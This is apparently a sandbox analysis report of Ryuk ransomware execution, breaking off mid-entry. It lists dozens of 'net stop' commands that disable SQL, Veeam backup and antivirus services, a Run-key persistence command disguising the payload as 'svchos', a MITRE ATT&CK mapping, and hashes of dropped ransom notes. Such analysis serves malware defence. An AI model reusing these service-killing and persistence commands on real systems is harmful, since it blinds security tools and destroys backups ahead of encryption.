"C:\Windows\System32\net.exe" stop SQLAgent$PRACTTICEBGC /y
2⤵
PID:3232

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$PRACTTICEBGC /y
3⤵
PID:3660

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop SQLAgent$ECWDB2 /y
2⤵
PID:3796

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$ECWDB2 /y
3⤵
PID:3544

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop SQLAgent$PRACTTICEMGT /y
2⤵
PID:3892

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$PRACTTICEMGT /y
3⤵
PID:3136

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop SQLAgent$SBSMONITORING /y
2⤵
PID:3168

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SBSMONITORING /y
3⤵
PID:3972

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop SQLAgent$PROFXENGAGEMENT /y
2⤵
PID:1596

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$PROFXENGAGEMENT /y
3⤵
PID:3616

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop SQLAgent$SHAREPOINT /y
2⤵
PID:3572

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SHAREPOINT /y
3⤵
PID:3652

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop SQLAgent$SYSTEM_BGC /y
2⤵
PID:3920

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SYSTEM_BGC /y
3⤵
PID:3952

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop SQLAgent$TPS /y
2⤵
PID:3788

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$TPS /y
3⤵
PID:608

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop SQLAgent$SQL_2008 /y
2⤵
PID:3824

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SQL_2008 /y
3⤵
PID:3632

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop SQLAgent$TPSAMA /y
2⤵
PID:3700

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$TPSAMA /y
3⤵
PID:4012

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop SQLAgent$VEEAMSQL2008R2 /y
2⤵
PID:4028

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y
3⤵
PID:3932

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop SQLAgent$VEEAMSQL2012 /y
2⤵
PID:3764

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2012 /y
3⤵
PID:3224

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop SQLBrowser /y
2⤵
PID:3760

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLBrowser /y
3⤵
PID:1440

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop SQLSafeOLRService /y
2⤵
PID:4020

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLSafeOLRService /y
3⤵
PID:3836

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop SQLSERVERAGENT /y
2⤵
PID:1004

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLSERVERAGENT /y
3⤵
PID:3344

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop SQLTELEMETRY /y
2⤵
PID:3624

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLTELEMETRY /y
3⤵
PID:4036

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop SQLTELEMETRY$ECWDB2 /y
2⤵
PID:3928

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLTELEMETRY$ECWDB2 /y
3⤵
PID:3756

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamMountSvc /y
4⤵
PID:3960

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop SQLWriter /y
2⤵
PID:3536

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLWriter /y
3⤵
PID:3912

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop SstpSvc /y
2⤵
PID:3804

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SstpSvc /y
3⤵
PID:3724

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop svcGenericHost /y
2⤵
PID:4060

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop svcGenericHost /y
3⤵
PID:3644

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop swi_service /y
2⤵
PID:3232

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop swi_service /y
3⤵
PID:3824

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop swi_filter /y
2⤵
PID:3812

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop swi_filter /y
3⤵
PID:3872

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop TmCCSF /y
2⤵
PID:3036

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop TmCCSF /y
3⤵
PID:3860

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop swi_update_64 /y
2⤵
PID:3580

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop swi_update_64 /y
3⤵
PID:3632

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop tmlisten /y
2⤵
PID:3492

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop tmlisten /y
3⤵
PID:4044

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop TrueKey /y
2⤵
PID:3916

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop TrueKey /y
3⤵
PID:4012

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop TrueKeyScheduler /y
2⤵
PID:3652

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop TrueKeyScheduler /y
3⤵
PID:3636

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop TrueKeyServiceHelper /y
2⤵
PID:4092

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop TrueKeyServiceHelper /y
3⤵
PID:3332

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop UI0Detect /y
2⤵
PID:4008

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop UI0Detect /y
3⤵
PID:3656

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop VeeamBackupSvc /y
2⤵
PID:3540

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamBackupSvc /y
3⤵
PID:4080

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop VeeamBrokerSvc /y
2⤵
PID:3956

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamBrokerSvc /y
3⤵
PID:3904

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$CITRIX_METAFRAME /y
4⤵
PID:3720

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop VeeamCatalogSvc /y
2⤵
PID:3364

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamCatalogSvc /y
3⤵
PID:3668

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop VeeamCloudSvc /y
2⤵
PID:4084

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamCloudSvc /y
3⤵
PID:3740

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop VeeamDeploymentService /y
2⤵
PID:1240

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamDeploymentService /y
3⤵
PID:3928

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop VeeamDeploySvc /y
2⤵
PID:3692

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamDeploySvc /y
3⤵
PID:3980

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop VeeamEnterpriseManagerSvc /y
2⤵
PID:3856

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamEnterpriseManagerSvc /y
3⤵
PID:3612

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop VeeamRESTSvc /y
2⤵
PID:3216

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamRESTSvc /y
3⤵
PID:4032

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop VeeamNFSSvc /y
2⤵
PID:3280

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamNFSSvc /y
3⤵
PID:3596

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop VeeamMountSvc /y
2⤵
PID:3756

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop VeeamTransportSvc /y
2⤵
PID:3544

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamTransportSvc /y
3⤵
PID:3168

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop W3Svc /y
2⤵
PID:1596

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop W3Svc /y
3⤵
PID:4064

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop wbengine /y
2⤵
PID:3748

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop wbengine /y
3⤵
PID:3916

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop WRSVC /y
2⤵
PID:4048

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop WRSVC /y
3⤵
PID:3888

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MSSQL$VEEAMSQL2008R2 /y
2⤵
PID:3840

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y
3⤵
PID:3848

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop SQLAgent$VEEAMSQL2008R2 /y
2⤵
PID:3508

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y
3⤵
PID:3704

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop VeeamHvIntegrationSvc /y
2⤵
PID:656

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamHvIntegrationSvc /y
3⤵
PID:3920

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop swi_update /y
2⤵
PID:3564

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop swi_update /y
3⤵
PID:3604

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop SQLAgent$CXDB /y
2⤵
PID:3884

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$CXDB /y
3⤵
PID:3816

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop "SQL Backups" /y
2⤵
PID:3496

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SQL Backups" /y
3⤵
PID:3980

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MSSQL$PROD /y
2⤵
PID:4036

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$PROD /y
3⤵
PID:1240

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop "Zoolz 2 Service" /y
2⤵
PID:4092

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Zoolz 2 Service" /y
3⤵
PID:3880

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MSSQLServerADHelper /y
2⤵
PID:4028

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQLServerADHelper /y
3⤵
PID:1440

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop SQLAgent$CITRIX_METAFRAME /y
2⤵
PID:3904

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop SQLAgent$PROD /y
2⤵
PID:3540

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$PROD /y
3⤵
PID:3600

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop EhttpSrv /y
2⤵
PID:4088

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop EhttpSrv /y
3⤵
PID:4052

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop NetMsmqActivator /y
2⤵
PID:3752

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop NetMsmqActivator /y
3⤵
PID:3168

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop msftesql$PROD /y
2⤵
PID:3772

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop msftesql$PROD /y
3⤵
PID:3260

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop ekrn /y
2⤵
PID:3664

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ekrn /y
3⤵
PID:3888

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop SQLAgent$SOPHOS /y
2⤵
PID:3852

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SOPHOS /y
3⤵
PID:3624

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MSSQL$SOPHOS /y
2⤵
PID:3544

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$SOPHOS /y
3⤵
PID:3232

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop ESHASRV /y
2⤵
PID:4032

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ESHASRV /y
3⤵
PID:3708

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop AVP /y
2⤵
PID:3280

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop AVP /y
3⤵
PID:3508

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop klnagent /y
2⤵
PID:3784

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop klnagent /y
3⤵
PID:3840

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MSSQL$SQLEXPRESS /y
2⤵
PID:3860

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$SQLEXPRESS /y
3⤵
PID:3920

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop SQLAgent$SQLEXPRESS /y
2⤵
PID:3632

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SQLEXPRESS /y
3⤵
PID:3740

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop wbengine /y
2⤵
PID:3788

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop wbengine /y
3⤵
PID:4024

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop kavfsslp /y
2⤵
PID:3864

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop kavfsslp /y
3⤵
PID:3960

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop KAVFSGT /y
2⤵
PID:4072

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop KAVFSGT /y
3⤵
PID:3188

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop KAVFS /y
2⤵
PID:656

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop KAVFS /y
3⤵
PID:3796

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop mfefire /y
2⤵
PID:3964

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop mfefire /y
3⤵
PID:3880

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REG ADD "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "svchos" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\ignorant-bike.exe" /f
2⤵
PID:3844

C:\Windows\system32\reg.exe
REG ADD "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "svchos" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\ignorant-bike.exe" /f
3⤵
- Adds Run key to start application
PID:1440

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-885750674678857916-1407385335-141768600345789449318626124504775921661301366933"
1⤵
PID:1192

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "17699939761574735812-5654384221746548735-126242430-1193586276-1743575207-1074368798"
1⤵
PID:1632

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "17277357331426701460-4651823752938505931904096163-25304545011811017411177733163"
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:916

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Sophos MCS Agent" /y
1⤵
PID:3996

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1714127377-650885466-948328399-117233732015348338413459423881977036934745966541"
1⤵
PID:3688

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1472967782-426364591-1422894386-572835456-1034896568448348920-2049007057750796155"
1⤵
PID:3900

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1267398311257055694-712709270186395782856378916707025305-1799861950-531484642"
1⤵
PID:3996

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-18782850901796760621-16024998012046522233519649876452180988433970983397094367"
1⤵
PID:3896

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-64247253598707806-802367706-130170784518370542081658945786359593567-2137483985"
1⤵
PID:3560

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "865867207810740990-88290118721232189441333060006-1383224510-1353386525-1178983525"
1⤵
PID:3828

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "90202243415128426951931884970335703138-1214997795280953068430778979-516135936"
1⤵
PID:1256

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1634067092-5185212681230068548431543398-1425923867-462492729-11569642932003352543"
1⤵
PID:3988

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-592529445-758574209-428022614-559998704-1546325990-2128498410-265610514-365507870"
1⤵
PID:3116

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1231519043-1097876932-221487364-1782604208-2114144083975134452-1924135975-1841022503"
1⤵
PID:3820

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1798312366-1830296336-1560120824-18519327515637832491221407551813795291699545881"
1⤵
PID:3324

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1281483129-2570822931510147123-13264603812077592758272437067-12352526691919618999"
1⤵
PID:3620

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1809083110961582034-1484919710-361839443-345709821-116524242817035378471997580085"
1⤵
PID:3696

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-12405242664327813321044293537471658690-1114118703-2010891335-511175958-829760647"
1⤵
PID:3792

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1958393663-19347893024078541561724713437-31940529010767724661313500273236786714"
1⤵
PID:3500

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-2139339143-1725349198-1119681250-1043437398-1505790662-21193693591461108036-1561113380"
1⤵
PID:3804

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "153537046520748966471678745374-539198620-8553374041877843706-2143903823-554063014"
1⤵
PID:4060

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-153731744916174887073031352811054912052-930748959-10317468197776008851526836426"
1⤵
PID:3728

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-5788456751739317570-420143176-1345707568-1028302481-1648211477-1980492252-1955107638"
1⤵
PID:3640

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "991697825460384519-106926953500949980-90092346878478723-759056390-503337404"
1⤵
PID:3968

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1945576000376168220-2113497553-789221745591349327-358419008-16826446726560731"
1⤵
PID:3764

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1458407743-1270785637-676078896185424828013274925961772344219-413257641633659314"
1⤵
PID:3700

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "9941645591257322215-50934018010937758051509955012-291800470-7477278411218874390"
1⤵
PID:4004

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1553518697-777142574-14669579021247053444-251773684105190063-2067951269-182426611"
1⤵
PID:3364

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1702194477987749453-2032762776-1994393849153353589440876984712664260461777572426"
1⤵
PID:4020

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1410379499-1006938465-21082346481529477867-16703419621170783660148920892-286686656"
1⤵
PID:3180

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "15198848312616994561896225920-8706485672031964314-97910990-1584081774-458312221"
1⤵
PID:3616

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1555622215246129449-2094044285-928271463-1429835463147201762716452717271247120750"
1⤵
PID:3684

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1646096107169691261312656166792008189120-1344859211-10671599131298387987311724864"
1⤵
PID:1596

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-993248650-754905689-17761471471822772197909556724449421498-16406273641295265866"
1⤵
PID:3724

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "204501602873996675851902554-1627386349-882397033720621303812861850-307496558"
1⤵
PID:3628

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "974119801-1752531560449997156-8842504211534219320-86244205816518484661640786635"
1⤵
PID:3580

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1809008496-23186320714951660898502623972266292227828075-1700834825-1520581591"
1⤵
PID:3800

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1509428261-271736485-1598842394513221916-143482745311369060656970377361091020066"
1⤵
PID:4000

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-689243786-142041661-170638649618019940351031001899-19114095391424463417-1947066266"
1⤵
PID:3316

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "823396913-20183585614244339242048926749-16083095581246934445-630042633-1748730377"
1⤵
PID:3556

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-961309972-2122516090-2014453209-268774112165640106210997384581991942461-1777967152"
1⤵
PID:3656

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1834619657-20653974631631644958-1020631143650514121336453559-17540739661389700026"
1⤵
PID:3904

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "25875527127356771328304690-1728364739-1292501365-1800244226-2124861507738303422"
1⤵
PID:3776

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3740

C:\Windows\system32\Dwm.exe
"C:\Windows\system32\Dwm.exe"
1⤵
PID:1092

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

File Deletion

T1107

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Documents and Settings\RyukReadMe.txt

MD5
68b615adf2c5a43d9b294f3f0afe2b3b

SHA1
ef7224b6d22e3df036176e857d683c1bf0c43267

SHA256
2ed66326685efb3c9189dc5d3105e4bafdb756293c38875736112b2a9e005a98

SHA512
05bfe1b7648e572a272429cd9e7a0e74bc604567eb63b025803719cc2827bacd98dc0d41a47a476d0219f7d29b2e0083a211006b9b693d0400f5470fdd1585f9

Download Submit
C:\MSOCache\All Users\RyukReadMe.txt

MD5
68b615adf2c5a43d9b294f3f0afe2b3b

SHA1
ef7224b6d22e3df036176e857d683c1bf0c43267

SHA256
2ed66326685efb3c9189dc5d3105e4bafdb756293c38875736112b2a9e005a98

SHA512
05bfe1b7648e572a272429cd9e7a0e74bc604567eb63b025803719cc2827bacd98dc0d41a47a476d0219f7d29b2e0083a211006b9b693d0400f5470fdd1585f9

Download Submit
C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\OWOW64WW.cab

MD5
57decfd332f4253835c6c2e1b8973ac0

SHA1
d9902dd79deb81be005000a971f98a90c33bb912

SHA256
2138f8048c9902ab296d9197e3192d531c85f58fe4684109ecf0b31a23bf941b

SHA512
2833c9afe08bc3bdd83fe73c213c5abe8d98d545acc87af02ce5baf80f249c8facda208783eb99147e8e40bfdb8ff5633f82a2f682c7bcb3324080fde6d0e9cd

Download Submit
C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\Office64WW.msi

MD5
60c67cd53535ae6d9a12fd9faa600b9b

SHA1
902801c859781ece41d6f024e67329a8a7c0bd6d

SHA256
033db5221380da2ed4174d82de97953d61adb1204dc46070f8f66eec67343365

SHA512
dd199790b06f5ac6e3e46a79ac7f5b8327432f84aafcec2fa4f58dedb82545bc514b625d5177aeba1cffd7a66c95945a3665ea9d09878348ed08a346c1b747cf

Download Submit
C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\Office64WW.xml

MD5
d342430df0e794bd4a6a77ad10426673

SHA1
126a111c867f6fb112356befaaa97445a356a238

SHA256
41d54f37d14791850ac5d59780c0adc0a453d344e1c224716adf6cd018e193d4

SHA512
a2f0185a3fa588ec0482e081e0a5703784b85a885f13387890f482dedb8b8eb50eb101732942565a45e4fd1941d1e32e43c30a889bf79a7d4663f53228ca332b

Download Submit
C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\ProPlusWW.msi

MD5
1504f8934cb1e135063d57fe5fd86eac

SHA1
8e3f32525660da403007dd3e289b2afb54c6cdbf

SHA256
904bf05bf7c30347c38f64330c22985ec9fe0a6c807941a92344e6342c507a3e

SHA512
bf236aaeb1162e52cf1122062f9e4970b8cb4c395937bdc291a54da9f8a538602e731ec6f397d92a82f75a63da5a9af7cd4d00a69c13a62b5cd4d34a413a975b

Download Submit
C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\ProPlusWW.xml

MD5
f6a31f7c9349888fa28178dbdb0d8b14

SHA1
6d811a6c2e7401f0b09fdfe624701a1a809fba1a

SHA256
547fd6188ac0979ff7662d205de5305acf41d46f20e1400d0878ad1caaefeae5

SHA512
f50b81d7f1fa5eaf9474b4a1c4e724b67b97dbd914ceefd4bf448b82d6610f7685712c55e2d7b201689e360077315f3639e8a666585fc3c65e61d99ca7849138

Download Submit
C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\ProPsWW.cab

MD5
9f23a9325d1fa077edc6a43529c18a2b

SHA1
163ec7915ac60276af6618aa4d2823b87b5c509b

SHA256
990040fde171b31891a1db7f4301768f3f5d22f7bc46c381b6d285df5fa3770f

SHA512
f5d0a281bf58c28df75d2fc940092fb37a667b17029c7a90d1d46aa710af3aa72d74a489e30b236b11fd24aca70782c46f5cfc58794c92f0075d4d09f5259534

Download Submit
C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\ProPsWW2.cab

MD5
3d2f87f0911220fe328793cc376305a8

SHA1
3fad1bab77f2f3bb2b10dc8104ff32aae3d4bc34

SHA256
0643022c8add48e20d91bf7da033b3b10e85e256303b54293c434719553435e4

SHA512
cf852779a11a50d0ae630aa323aad8ede2d911d40ecce258f1fcf22a6b8b92ec223bcaebf8445ee7af94fe74053c9ab606e559de732e37b8fa9eeacf176954ea

Download Submit
C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\RyukReadMe.txt

MD5
68b615adf2c5a43d9b294f3f0afe2b3b

SHA1
ef7224b6d22e3df036176e857d683c1bf0c43267

SHA256
2ed66326685efb3c9189dc5d3105e4bafdb756293c38875736112b2a9e005a98

SHA512
05bfe1b7648e572a272429cd9e7a0e74bc604567eb63b025803719cc2827bacd98dc0d41a47a476d0219f7d29b2e0083a211006b9b693d0400f5470fdd1585f9

Download Submit
C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\Setup.xml

MD5
3e70d51367de742d22a46ace936993db

SHA1
8f3b48552ae2da0163c35c9a349866b742504b1d

SHA256
6e0cc0e71a1c8a19d6dada5cf92ae057016235bfdadf9f6fa5e90cf50d67248a

SHA512
2f685ba4e32367637b3c4a904ef3d22dd908b2edfd654441311f074a413a02169d5d00cc1db52dce2d13036117e54976b5651433b3a62c2868a9f6d1ad620a79

Download Submit
C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\pkeyconfig-office.xrm-ms

MD5
b300a9ee86f0ace7fcb92a70a8599291

SHA1
ee37aeb4039407e93bf5d3ca59cb99a8ac3e8401

SHA256
2c5ee9e3e4da3984c8060f517637fd25434e0459063d49ae3c3394ac49dfa5cf

SHA512
2a6af32e131b96cf118c8ffe22bc4a4968aaaf7a2d738c4745d22213a9c79e7e1f000fc9e6520539710bddb1e54c1451bc092d0b9529b618e165e42ff1129992

Download Submit
C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\ExcelLR.cab

MD5
e72b36809358b2e0b58c33296396bde1

SHA1
